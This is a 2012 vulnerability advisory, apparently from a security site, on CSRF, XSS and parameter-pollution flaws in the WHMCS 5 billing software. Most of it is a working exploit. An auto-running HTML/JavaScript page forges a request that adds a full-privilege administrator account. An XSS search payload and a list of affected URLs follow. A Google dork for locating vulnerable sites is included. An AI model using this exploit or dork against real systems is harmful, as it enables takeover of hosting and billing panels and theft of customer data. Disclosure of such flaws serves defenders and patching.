WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability

2012.05.30
Credit: Shadman Tanjim
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352
Dork: \"Powered by WHMCompleteSolution\"

######## # Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability # Version: Latest version 5.1 and other previous version maybe vulnerable # Vendor: www.whmcs.com # Date: 2012-05-30 # Tested on: win/linux # Author/Found by: Shadman Tanjim # Email: shadman2600@gmail.com # Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army. # Special Thanks: x8631p # Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS ########## CSRF Vulnerability: Get: http://site.com/clientarea.php http://site.com/admin/index.php http://site.com/admin/login.php Post: http://site.com/admin/login.php http://site.com/cart.php http://site.com/admin/configadmins.php http://site.com/pwreset.php p0c: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <h2>WHMCS CSRF ExpL0iT PoC</h2> </head> <script language="javascript" type="text/javascript" > function lifeissimple() { var token = "Token Value"; var img = document.createElement("img"); var site="http://www.localhost.com:80"; var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&email=deadcow@deadcow.com&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English"; img.setAttribute("src", requesturl); document.body.appendChild(img); var img2 = document.createElement("img"); img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&"); document.body.appendChild(img); } </script> <body onload="lifeissimple();"> </body> </html> Cross-site Scripting (XSS) Vulnerability: request:POST http://site.com/knowledgebase.php?action=search HTTP/1.1 Content-Type: application/x-www-form-urlencoded search='%20onerror%3D'f(PSRyh) HTTP Parameter Pollution : 1.Affected link: http://site.com/cart.php?a=add&domain=transfer&n913620=v992636 Affected parameter: a=add 2. Affected link: http://site.com/domainchecker.php?search=bulkregister&amp;n946774=v992350 Affected parameter: search=bulkregister 3. Affected link: http://site.com/cart.php?currency=2&gid=1&amp;n972751=v976696 Affected parameter: currency=2

References:

http://www.whmcs.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top